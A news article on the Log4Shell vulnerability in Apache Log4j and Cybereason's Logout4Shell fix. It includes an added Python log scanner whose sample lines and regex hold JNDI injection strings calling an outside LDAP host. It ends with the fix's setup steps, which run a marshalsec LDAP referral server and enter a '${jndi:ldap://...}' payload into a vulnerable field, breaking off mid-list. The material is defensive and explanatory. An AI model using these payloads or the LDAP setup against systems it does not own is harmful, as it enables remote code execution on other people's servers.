Security firm releases a free fix for serious Log4Shell vulnerability in Apache Log4j
If you are running a version of Apache Log4j between 2.0-beta9 and 2.14.1 (inclusive), the Log4Shell vulnerability is something you need to be aware of. Tracked as CVE-2021-44228, this is a serious and easily exploited RCE flaw in the open-source Java-based logging utility.
An attacker can exploit the flaw remotely simply by supplying a crafted string, for example as the browser user agent. Although the Apache Software Foundation has released a patched version, Log4j 2.15.0, not everyone is able to update straight away, and this is something that attackers are taking advantage of. Thankfully, security firm Cybereason has released a "vaccine" called Logout4Shell that protects against Log4Shell.
The company has produced the free "vaccine" which fixes the flaw by using the bug against itself.
Writing about the vulnerability in a blog post, Cybereason says: "A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project's GitHub on December 9, 2021. The flaw has been dubbed 'Log4Shell', and has the highest possible severity rating of 10. Apache is pervasive and comprises nearly a third of all web servers in the world -- making this a potentially catastrophic flaw."
The company continues:
Log4j is an open source Java logging library that is widely used in a range of software applications and services around the world. The vulnerability can allow threat actors to take control of any Java-based, internet-facing server and engage in remote code execution (RCE) attacks.
Most login screens in the world typically audit failed login attempts, meaning that virtually every authenticated page using Log4j is vulnerable. Browser search bars are also often logged and expose systems to this flaw.
Exploiting the flaw is fairly trivial. An attacker can exploit the vulnerability by simply sending a malicious code string that gets logged by Log4j. At that point, the exploit will allow the attacker to load arbitrary Java code and take control of the server.
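As an added example (not Cybereason's code and not part of the original article), the following Python script scans constructed Apache combined-format access log lines for the `${jndi:` lookup string in the request, referer and user-agent fields, URL-decoding each field first because query strings are logged encoded. The log lines, addresses and timestamps are made up.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (not real traffic);
# the addresses are documentation ranges and the timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:12:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:10:12:07 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [10/Dec/2021:10:12:09 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.79.1"
203.0.113.12 - - [10/Dec/2021:10:13:00 +0000] "POST /login HTTP/1.1" 401 0 "https://example.test/" "Mozilla/5.0"
"""

# One combined-format line: client, identd, user, [time], "request", status,
# bytes, "referer", "user agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The Log4j lookup prefix the article describes; matched case-insensitively
# so differently cased copies of the same string are not missed.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_probes(log_text):
    """Return one dict per log line whose request, referer or user-agent field
    carries a JNDI lookup string: line number, client IP, field, decoded value."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        for field in ("req", "ref", "ua"):
            value = unquote(m.group(field))  # query strings are logged URL-encoded
            if JNDI_RE.search(value):
                hits.append({"line": lineno, "ip": m.group("ip"),
                             "field": field, "value": value})
                break  # one finding is enough to flag the line
    return hits


if __name__ == "__main__":
    for hit in find_jndi_probes(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['ip']} sent a JNDI lookup "
              f"in {hit['field']}: {hit['value']}")
```

Lines that are not in combined format are skipped rather than half-parsed, so point the scanner at the log whose format matches the regex.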
Over on GitHub, Cybereason has released its Logout4Shell vaccine, and provides the following instructions:
- Download this repo:
    git clone https://github.com/cybereason/Logout4Shell.git
- Build it:
    mvn package
    cd target/classes
- Run the webserver:
    python3 -m http.server 8888
- Download, build and run Marshalsec's LDAP server:
    git clone https://github.com/mbechler/marshalsec.git
    mvn package -DskipTests
    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<IP_OF_PYTHON_SERVER_FROM_STEP_1>:8888/#Log4jRCE"
- To immunize a server, enter
    ${jndi:ldap://<IP_OF_LDAP_SERVER_FROM_STEP_2>:1389/a}
  into a vulnerable field (such as user name)
- enter